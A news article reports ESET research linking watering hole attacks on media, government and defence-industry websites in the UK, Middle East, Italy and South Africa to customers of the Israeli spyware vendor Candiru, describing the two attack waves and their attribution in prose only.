Candiru linked to watering hole attacks in UK and Middle East

Cybersecurity researchers have found that Candiru, an Israeli spyware vendor and surveillance company that was recently blacklisted by the US, has reportedly waged “watering hole” attacks against high-profile websites and organisations in the UK, the Middle East, Italy and even South Africa according to new findings from ESET, a Slovakian cybersecurity firm. 

The cyber attacks hit a wide variety of victims, ESET researchers stating that “the victimized websites belong to media outlets in the U.K., Yemen, and Saudi Arabia, as well as to Hezbollah” as well as “to government institutions in Iran (Ministry of Foreign Affairs), Syria (including the Ministry of Electricity), and Yemen (including the Ministries of Interior and Finance)” and “to internet service providers in Yemen and Syria”. 

Interestingly, even aerospace and military technology companies in Italy and South Africa were hit by the “watering hole” cyber attacks. The threat actors also created a website impersonating a German medical trade fair. 

It’s believed that the watering hole campaign happened in two waves, the first occurring as early as March 2020 and lasted until August 2020, while the second wave of attacks began in January 2021 and ended in early August 2021 with targeted websites being sanitised of the malicious scripts. 

What is the attack? 

Watering hole attacks are a type of attack where malicious actors target a website frequently visited by members of a group that are “targets of interest” and compromise it by infecting it with malicious script. The websites act as a jumping off point, where users of the visit site will visit it again at some point and open up a gateway into their machines for hackers to exploit. 

It is essentially the cyber equivalent of poisoning the village well. “The compromised websites are only used as a jumping-off point to reach the final targets,” ESET said. 

The first wave of attack chains involved injecting JavaScript code into the websites from a remote attacker-controlled domain designed to collect and exfiltrate IP geolocation and system information about the victim machine. 

The attack only proceeded further if the operating system hit was either Windows or MacOS, indicating the attacks were primarily targeting computers and not mobile devices, unlike the Israel-related Pegasus spyware by the NSO group, a far more prominent and infamous Israeli surveillance company. If the attack continued, a browser remote code execution exploit often enabled the threat actor to take control of victims’ computers. 

In contrast, the second wave of attacks was stealthier, the JavaScript modification made to legitimate WordPress scripts used by the websites like “wp-embed.min.js” instead of injecting malicious code directly into the main HTML page. This method was utilised to load a script from a server under the threat actors’ control. 

Notably, the fingerprinting script, which is used to draw an image and capture user browser data, not only just harvested system metadata to capture the default language but also the list of fonts supported by the browser, the list of browser plugins, and the time zone. 

Attribution 

ESET was also able to link the second wave to a threat actor being tracked by Kaspersky, a Russian cybersecurity company, as Karkadann, citing overlaps in the tactics, techniques, and procedures (TTPs). Karkadann is an APT known for targeting government bodies and news outlets across the Middle East as of at least October 2020. 

Links between the campaign and Candiru were drawn when it was discovered a few of the command-and-control servers used by the threat actors to carry out attacks bore similarities to domains which had already been identified as belonging to the Tel Aviv-based company. There was also medium confidence that “the operators of the watering holes are customers of Candiru” based on evidence ESET had collected. 

Further links included how the attackers ceasing operations at the end of July 2021 happened around the same time public disclosures linked Candiru to the exploitation zero-day vulnerabilities in the Google Chrome browser targeting victims in Armenia. The firm was also linked to zero-day Window vulnerability exploitations that targeted over 100 journalists, activists, political dissidents and academics globally. 

“It seems that the operators are taking a pause, probably in order to retool and make their campaign stealthier,” said Mattieu Faou, an ESET malware researcher. “We expect to see them back in the ensuing months”. 

At the moment, the exact exploit and the final payload delivered are unknown, showing “that the operators choose to narrow the focus of their operations and that they don't want to burn their zero-day exploits,” according to Faou. 

News of these cyber attacks comes only weeks after Candiru and NSO Group were added to a US blacklist by the Biden administration. Both Israeli firms had been accused of acting against US national security interests.